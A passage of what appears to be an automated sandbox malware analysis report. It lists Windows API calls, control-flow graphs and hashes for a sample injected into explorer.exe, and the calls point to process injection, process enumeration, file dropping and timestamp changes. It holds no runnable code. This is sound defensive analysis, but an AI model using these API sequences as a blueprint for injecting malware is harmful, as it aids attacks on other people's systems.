                                    • Part of subcall function 026E4760: NtCreateSection.NTDLL ref: 026E47D2
                                  • NtQueryInformationProcess.NTDLL ref: 026E31A2
                                  • NtQueryInformationProcess.NTDLL ref: 026E31CA
                                  • ReadProcessMemory.KERNEL32 ref: 026E31FD
                                  • ReadProcessMemory.KERNEL32 ref: 026E322B
                                  • WriteProcessMemory.KERNEL32 ref: 026E32A8
                                  • CloseHandle.KERNEL32 ref: 026E32B2
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$InformationQueryRead$CloseCreateHandleSectionWrite
                                  • String ID:
                                  • API String ID: 1020863039-0
                                  • Opcode ID: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
                                  • Instruction ID: b0989ca1130116eeec13a25ce29b629398473ccb78bcf1b15dda7e2b2db4b656
                                  • Opcode Fuzzy Hash: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
                                  • Instruction Fuzzy Hash: 9DB16331A18A489FDB18EF68D4456E9B3E1FB98310F10426ED84BE7245DF30E9068BC5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 140 26e3bf4-26e3c0b 141 26e3cab-26e3cc4 140->141 142 26e3c11-26e3c23 CreateToolhelp32Snapshot 140->142 143 26e3c25-26e3c3b Process32First 142->143 144 26e3c93-26e3ca5 SleepEx 142->144 145 26e3c86-26e3c88 143->145 144->141 144->142 146 26e3c3d-26e3c54 call 26e50b0 145->146 147 26e3c8a-26e3c8d CloseHandle 145->147 150 26e3c56-26e3c58 146->150 147->144 151 26e3c6c-26e3c73 call 26e4714 150->151 152 26e3c5a-26e3c68 150->152 155 26e3c78-26e3c80 Process32Next 151->155 152->150 153 26e3c6a 152->153 153->155 155->145
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 2482764027-0
                                  • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                  • Instruction ID: 496c4ca35f7667d13b00f271b1f10018a38474cde457f7fff3d672e6d8f926d1
                                  • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                  • Instruction Fuzzy Hash: 6721C030118A08CFDF18AF64C4887BA72A2FB88719F0406BED44BDB284DB34D5968751

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 284 26e4760-26e478d 285 26e483b-26e483c 284->285 286 26e4793-26e47ab call 26e53d8 284->286 287 26e483e-26e4857 285->287 290 26e4832-26e4835 286->290 291 26e47b1-26e47db NtCreateSection 286->291 294 26e4829-26e4830 290->294 295 26e4837-26e4838 290->295 292 26e47dd-26e47df 291->292 293 26e4825-26e4827 291->293 292->295 296 26e47e1-26e47e5 292->296 293->294 293->295 297 26e47e7-26e481d 294->297 295->285 296->297 297->295 299 26e481f-26e4823 297->299 299->287
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateSection
                                  • String ID: @$@
                                  • API String ID: 2449625523-149943524
                                  • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                  • Instruction ID: 5817ea6c42d3861b342e330b9afc8cbb51ba58e983ca398d55fc7d691be8cfd5
                                  • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                  • Instruction Fuzzy Hash: 87316D70908B898FCF94EF68C88976AB7E0FB58305F10066EE85EE3251DB30D840CB81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 372 26e5174-26e51b3 CryptAcquireContextA 373 26e51b9-26e521b 372->373 374 26e5256-26e526a 372->374 379 26e521e-26e523e 373->379 381 26e5240-26e524e 379->381 381->374
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32 ref: 026E51A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AcquireContextCrypt
                                  • String ID: %02X
                                  • API String ID: 3951991833-436463671
                                  • Opcode ID: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                  • Instruction ID: 3955d622917876ca0de668a16536157fc7dc1ca5911a15b0e37a906029832221
                                  • Opcode Fuzzy Hash: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                  • Instruction Fuzzy Hash: 54317C30618A0D8FCF58EF68D8886EE7BA1FB98305F00027DE84EE7245DF3495419B95
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID:
                                  • API String ID: 542301482-0
                                  • Opcode ID: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
                                  • Instruction ID: 4ccd5d3a4a84a8aed268657513dfbb6d52ca3625c342435c9f4c4dc742e43013
                                  • Opcode Fuzzy Hash: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
                                  • Instruction Fuzzy Hash: F7E1D934608A488FCF94EF28C895EA9B7F1FFA9305F114699E44ACB265DB70E944CB41
                                  APIs
                                  • GetUserNameW.ADVAPI32 ref: 026E34E4
                                    • Part of subcall function 026E35E8: CoCreateInstance.OLE32 ref: 026E3635
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstanceNameUser
                                  • String ID:
                                  • API String ID: 3213660374-0
                                  • Opcode ID: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
                                  • Instruction ID: ebd4fb42d07238a9a957041139b8397e79a1a923f8ae8cbb6469a024fca1fcdf
                                  • Opcode Fuzzy Hash: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
                                  • Instruction Fuzzy Hash: 09113630718B4C4FCF90EF68905876EB6E2FBDC304F800A6E994EC3355DA7889458B85

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$Thread$CloseHandleHeapLibraryLoad
                                  • String ID: %g?$iP+
                                  • API String ID: 2806579993-765743493
                                  • Opcode ID: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                  • Instruction ID: 74b0b6cc3197336c46c31cefec7b0ad37995e9a1e30c32252028f18772c319d5
                                  • Opcode Fuzzy Hash: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                  • Instruction Fuzzy Hash: DB91D830619E088FCF14EF28D8816A573D6FB99304B4801BD9C4FCB256EB74D952EB96

                                  Control-flow Graph

                                  APIs
                                  • DeleteFileW.KERNEL32 ref: 026E1F8E
                                  • CopyFileW.KERNEL32 ref: 026E1F9D
                                  • DeleteFileW.KERNEL32 ref: 026E1FAE
                                  • DeleteFileW.KERNEL32 ref: 026E1FF9
                                    • Part of subcall function 026E4920: SetFileAttributesW.KERNEL32 ref: 026E496F
                                    • Part of subcall function 026E4920: CreateFileW.KERNEL32 ref: 026E4999
                                    • Part of subcall function 026E4920: SetFileTime.KERNEL32 ref: 026E49C4
                                  • CreateFileW.KERNEL32 ref: 026E2085
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCopyTime
                                  • String ID:
                                  • API String ID: 642576546-0
                                  • Opcode ID: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                  • Instruction ID: fde14e51002cf14f1231e87259ce2be0c2541a51e454e1b2cd7b23dca6d38046
                                  • Opcode Fuzzy Hash: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                  • Instruction Fuzzy Hash: FF413820719A4C4FCFA8AFA8945836E72D3EBD8714F54456EA80FC7386DE3499068B85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 156 26e230c-26e2369 call 26e3de0 159 26e236f-26e2374 156->159 160 26e2817 156->160 159->160 162 26e237a-26e237d 159->162 161 26e281d-26e2837 160->161 162->160 163 26e2383-26e238e 162->163 164 26e2807-26e280d call 26e5348 163->164 165 26e2394-26e23c7 call 26e4fc8 163->165 169 26e2812-26e2815 164->169 165->164 171 26e23cd-26e23f2 call 26e4f1c call 26e50dc 165->171 169->160 169->161 176 26e241d 171->176 177 26e23f4-26e240e 171->177 178 26e2422-26e243b call 26e50dc 176->178 177->176 181 26e2410-26e241b 177->181 183 26e25aa-26e25b2 178->183 184 26e2441-26e2454 178->184 181->178 185 26e279d-26e27ca call 26e3de0 183->185 186 26e25b8-26e25bc 183->186 187 26e24a6-26e24a8 184->187 188 26e2456-26e249d 184->188 201 26e27ff-26e2805 185->201 202 26e27cc-26e27d3 185->202 191 26e2664-26e26f4 call 26e46a0 call 26e3444 call 26e3de0 call 26e5348 186->191 192 26e25c2-26e25ca 186->192 187->183 190 26e24ae-26e2520 call 26e5368 DeleteFileW CreateFileW 187->190 188->187 217 26e259f-26e25a5 call 26e5348 190->217 218 26e2522-26e2579 call 26e4f1c call 26e4fc8 WriteFile 190->218 191->164 196 26e26f9-26e2726 call 26e3de0 192->196 197 26e25d0-26e25dd 192->197 196->201 210 26e272c-26e2733 196->210 197->201 208 26e25e3-26e25e6 197->208 201->164 202->201 207 26e27d5-26e27d8 202->207 207->201 211 26e27da-26e27fa call 26e2840 call 26e5348 207->211 208->201 213 26e25ec-26e25f0 208->213 210->201 215 26e2739-26e273c 210->215 211->201 219 26e2657-26e265e 213->219 220 26e25f2-26e261f call 26e3de0 213->220 215->201 222 26e2742-26e279b call 26e2840 call 26e46a0 call 26e5348 215->222 217->183 250 26e2582-26e259a call 26e4920 call 26e52cc 218->250 219->191 219->201 235 26e2651-26e2655 220->235 236 26e2621-26e2628 220->236 222->201 235->219 235->220 236->235 240 26e262a-26e262d 236->240 240->235 244 26e262f-26e264c call 26e2840 call 26e5348 240->244 244->235 250->217
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteWrite
                                  • String ID: |:|
                                  • API String ID: 2199199414-3736120136
                                  • Opcode ID: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                  • Instruction ID: 26483fb46fa5e73f75854007ec7022209421c5106bab40e6a48bf2f33d449ae6
                                  • Opcode Fuzzy Hash: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                  • Instruction Fuzzy Hash: F9E1B930719F488FDF19AB6884657AA77D6FB88315F10062ED89FC3281DF74E9028746

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AgentCloseObtainOpenQueryStringUserValue
                                  • String ID:
                                  • API String ID: 2776781324-0
                                  • Opcode ID: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                  • Instruction ID: bd12c5f38f463fb2f14c02803004ebdd44ec770e0062da2aed335cadf672cf90
                                  • Opcode Fuzzy Hash: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                  • Instruction Fuzzy Hash: 28319631608A488FDF18EF68D8896EA77D6FB98314B00027ED95BC7245EF70D8068791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 300 26e32ec-26e333f CreateFileW 301 26e33b5-26e33b8 300->301 302 26e3341-26e3351 300->302 303 26e33ba-26e33bd 301->303 304 26e3420-26e3421 301->304 308 26e33ac-26e33af CloseHandle 302->308 309 26e3353-26e3387 call 26e5328 ReadFile 302->309 303->304 307 26e33bf-26e33e1 call 26e5328 call 26e4f1c 303->307 306 26e3423-26e343c 304->306 316 26e33e3-26e3406 307->316 308->301 317 26e338f-26e33a3 call 26e4fc8 309->317 321 26e3408-26e341e call 26e52cc * 2 316->321 317->308 322 26e33a5-26e33a6 317->322 321->306 322->308
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleRead
                                  • String ID:
                                  • API String ID: 1035965006-0
                                  • Opcode ID: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                  • Instruction ID: 5b3c57caafa155d757dcaf0c2c1941cc82eb3a82397caccbbb81feeea83d119b
                                  • Opcode Fuzzy Hash: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                  • Instruction Fuzzy Hash: 5341C03071CF0D4FDB5CAA6C98593BAB2D2EBC8315F14026EA89BC3345EF24981247C6

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 026E4C90: GetVolumeInformationA.KERNEL32 ref: 026E4CFD
                                  • CreateMutexExA.KERNEL32 ref: 026E1DFF
                                  • CreateFileMappingA.KERNEL32 ref: 026E1EB1
                                  • SleepEx.KERNEL32 ref: 026E1EEE
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$FileInformationMappingMutexSleepVolume
                                  • String ID:
                                  • API String ID: 3744091137-0
                                  • Opcode ID: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                  • Instruction ID: 13a99e93484df9ac8575dcd2ea6327081649083f683c840881a58be3373ac3fa
                                  • Opcode Fuzzy Hash: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                  • Instruction Fuzzy Hash: 1C418130715F088FEF64FB7880587AE76D2EB98706F504A2E905FD6244CF749A069B85

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AttributesCreateTime
                                  • String ID:
                                  • API String ID: 1986686026-0
                                  • Opcode ID: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                  • Instruction ID: 5360b04a86aa480c2739d2228a50b9e3c56c082eb4fbe7bf2718f79ec2283c9d
                                  • Opcode Fuzzy Hash: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                  • Instruction Fuzzy Hash: 3321303070CB488FDF64EF68988879EB6E2FBDC705F10456EA84EC7245DA34DA058782

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 383 26e3f7c-26e3fbd 384 26e3fbf-26e3fc1 383->384 385 26e3fc6-26e400c call 26e5328 call 26e5274 call 26e4434 383->385 386 26e439c-26e43b7 384->386 393 26e400e-26e4018 385->393 394 26e401a-26e4020 385->394 395 26e4022-26e4030 393->395 394->395 397 26e438e-26e439a call 26e52cc 395->397 398 26e4036-26e406d 395->398 397->386 403 26e4383-26e4384 398->403 404 26e4073-26e409e 398->404 403->397 404->403 406 26e40a4-26e40b9 404->406 407 26e410f-26e4114 406->407 408 26e40bb-26e40bd 406->408 410 26e4117-26e4150 407->410 409 26e40bf-26e40db call 26e4f1c 408->409 408->410 414 26e40dd-26e40f4 call 26e4fc8 409->414 415 26e40f9-26e410d call 26e4f1c 409->415 416 26e4156-26e415c 410->416 417 26e4350-26e435d 410->417 414->415 415->410 420 26e417e-26e4188 416->420 421 26e415e-26e417b 416->421 429 26e435f-26e4365 call 26e52cc 417->429 430 26e436a-26e436d 417->430 422 26e418e-26e4199 420->422 423 26e4233-26e4259 420->423 421->420 427 26e419b 422->427 428 26e41a0-26e422b call 26e4f1c call 26e5328 call 26e5384 call 26e4f1c call 26e43c0 call 26e52cc * 3 422->428 438 26e425f-26e4270 423->438 439 26e4332-26e4343 423->439 427->428 428->423 429->430 433 26e436f-26e4375 call 26e52cc 430->433 434 26e437a-26e4380 430->434 433->434 434->403 438->439 446 26e4276-26e42a1 RtlAllocateHeap 438->446 439->417 444 26e4345-26e434b call 26e52cc 439->444 444->417 449 26e42a3-26e42ad 446->449 450 26e42af-26e42cb RtlReAllocateHeap 449->450 451 26e42cd-26e42eb 449->451 450->451 456 26e42ef-26e42f4 451->456 457 26e42ed 451->457 456->449 459 26e42f6-26e4301 456->459 457->456 461 26e4322-26e432a 459->461 462 26e4303-26e4309 call 26e5368 459->462 461->439 466 26e430e-26e4318 462->466 466->461
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                  • Instruction ID: 3923613796ac716fec7d094a655ef93412e9ee1c88731cb496e160db23694ccc
                                  • Opcode Fuzzy Hash: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                  • Instruction Fuzzy Hash: FED17C30619B098FDB68EB7894456AEB7E2FB98701F10452EE44BD3241DF74E8068B86

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 471 26e2cd0-26e2cfe call 26e32ec 474 26e2d04-26e2d0f 471->474 475 26e2f92-26e2fa2 471->475 474->475 476 26e2d15-26e2d17 474->476 477 26e2f7d-26e2f8d call 26e52cc 476->477 478 26e2d1d-26e2d26 476->478 477->475 478->477 479 26e2d2c-26e2d33 478->479 479->477 481 26e2d39-26e2d6f call 26e4d8c 479->481 481->477 486 26e2d75-26e2d94 call 26e4518 481->486 489 26e2d9a-26e2d9b 486->489 490 26e2f67-26e2f78 call 26e52cc * 2 486->490 491 26e2d9d-26e2dbf 489->491 490->477 496 26e2f55-26e2f60 491->496 497 26e2dc5-26e2de0 call 26e4fc8 491->497 496->490 497->496 500 26e2de6-26e2dea 497->500 500->496 501 26e2df0-26e2e02 500->501 502 26e2e0c-26e2e31 call 26e4578 501->502 503 26e2e04-26e2e06 501->503 507 26e2f29-26e2f2f call 26e52cc 502->507 508 26e2e37-26e2ee9 call 26e5328 call 26e2fac 502->508 503->502 504 26e2f34-26e2f4f SleepEx 503->504 504->491 504->496 507->504 519 26e2efa-26e2f0a ResumeThread call 26e52cc 508->519 520 26e2eeb-26e2ef3 508->520 522 26e2f0f-26e2f22 519->522 520->519 522->507
                                  APIs
                                    • Part of subcall function 026E32EC: CreateFileW.KERNEL32 ref: 026E3332
                                    • Part of subcall function 026E32EC: ReadFile.KERNEL32 ref: 026E3379
                                    • Part of subcall function 026E32EC: CloseHandle.KERNEL32 ref: 026E33AF
                                  • ResumeThread.KERNEL32 ref: 026E2EFE
                                  • SleepEx.KERNEL32 ref: 026E2F43
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleReadResumeSleepThread
                                  • String ID:
                                  • API String ID: 2967322886-0
                                  • Opcode ID: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                  • Instruction ID: f85e1bd5f8d9bb995eae38aaf50293a70ca5fac1221a73198e76d77279e78874
                                  • Opcode Fuzzy Hash: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                  • Instruction Fuzzy Hash: 98719730718F499FDB68EB28C4587AAB3D6FB98311F54462DD49FC3241DF34A8428782

                                  Control-flow Graph

                                  APIs
                                  • GetTokenInformation.ADVAPI32 ref: 026E4A94
                                  • GetTokenInformation.ADVAPI32 ref: 026E4ACB
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID:
                                  • API String ID: 4114910276-0
                                  • Opcode ID: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                  • Instruction ID: 7af1c5f56d5b20c304a751319260d9f7fd0c9eb729f507c460db1b4471489017
                                  • Opcode Fuzzy Hash: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                  • Instruction Fuzzy Hash: 83213334608B088FCB54EB28C49866AB7E2FBD9311B000A6EE59BC7254DF70D845DB81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 539 26e3cd0-26e3ce0 540 26e3d06-26e3d14 539->540 541 26e3ce2-26e3d04 EnumWindows SleepEx 539->541 541->540 541->541
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumSleepWindows
                                  • String ID:
                                  • API String ID: 498413330-0
                                  • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                  • Instruction ID: 48fe17e05f4a176600ea2d754bbdcbc541cd04a62d8bed1acb4b95505e4c7f31
                                  • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                  • Instruction Fuzzy Hash: ABE04F30505609CFEF28ABA5C0D8BB036A2EB18206F1401BADC0EDE385CB768995C720
                                  APIs
                                  • CreateProcessInternalW.KERNEL32 ref: 026E465C
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                  • Instruction ID: 4b2f27748fb412acb69234b1976e644e31c5756be0e30ff89d7c40c2b4edccef
                                  • Opcode Fuzzy Hash: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                  • Instruction Fuzzy Hash: 01318B30708F484FCB98EF68908875AB6E2FB98305F504A6EA44EC7245DFB4D8458B85
                                  APIs
                                  • GetVolumeInformationA.KERNEL32 ref: 026E4CFD
                                    • Part of subcall function 026E5174: CryptAcquireContextA.ADVAPI32 ref: 026E51A9
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AcquireContextCryptInformationVolume
                                  • String ID:
                                  • API String ID: 4059528372-0
                                  • Opcode ID: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                  • Instruction ID: db4a50cb96561283532f3564b2857d3eacadaa7259c174fbb9cdba18a5ab444f
                                  • Opcode Fuzzy Hash: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                  • Instruction Fuzzy Hash: 9F316730618B4C8FDB64EF68D448BAA77E2FBE8311F50462E984FD7264DE30D9458B81
                                  APIs
                                    • Part of subcall function 026E19D0: RtlCreateHeap.NTDLL ref: 026E1AE7
                                  • SleepEx.KERNEL32(?,?,?,?,?,?,?,026E1973), ref: 026E19A0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 026E1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_26e1000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateHeapSleep
                                  • String ID:
                                  • API String ID: 221814145-0
                                  • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                  • Instruction ID: 4046daadf1f9fadf012f16f47ff7a640b557d39b561d5b377b3da2e3d8ff8d86
                                  • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                  • Instruction Fuzzy Hash: EAE0DF20719A080BDF98BB78848433C31A2EBDA200F4019BE690FCB285D938CC809722
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <Q $D@ $D@ $D@ $D@
                                  • API String ID: 0-3662597226
                                  • Opcode ID: 07d610e10acc9fb039f4bcccda338c3e76ffa61f269ed59b9615aff695de3b3e
                                  • Instruction ID: 417a843e04dc348d1fa147b2cc64e49981b495349208a44fefc13a15720dc354
                                  • Opcode Fuzzy Hash: 07d610e10acc9fb039f4bcccda338c3e76ffa61f269ed59b9615aff695de3b3e
                                  • Instruction Fuzzy Hash: BC02D1706107559FCB15DF68D884A6EBBF2FF88301B14C969D9099B396CB30EC46CB94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D@ $D@
                                  • API String ID: 0-1885723076
                                  • Opcode ID: 1cb57fe688855ede0de2a623e3dc880d0e6cb8030b1a3a62f3cd70c92e31ea9c
                                  • Instruction ID: bc59859d3504e1c8433363f6f6e8ebe2b15815414c236a4a756a4e509e7fb8a4
                                  • Opcode Fuzzy Hash: 1cb57fe688855ede0de2a623e3dc880d0e6cb8030b1a3a62f3cd70c92e31ea9c
                                  • Instruction Fuzzy Hash: 8311C871B143149FC715A774E814B5D7F76DF89200F1440AAD6099B392CE749D06CB91
                                  Strings
                                  Memory Dump Source
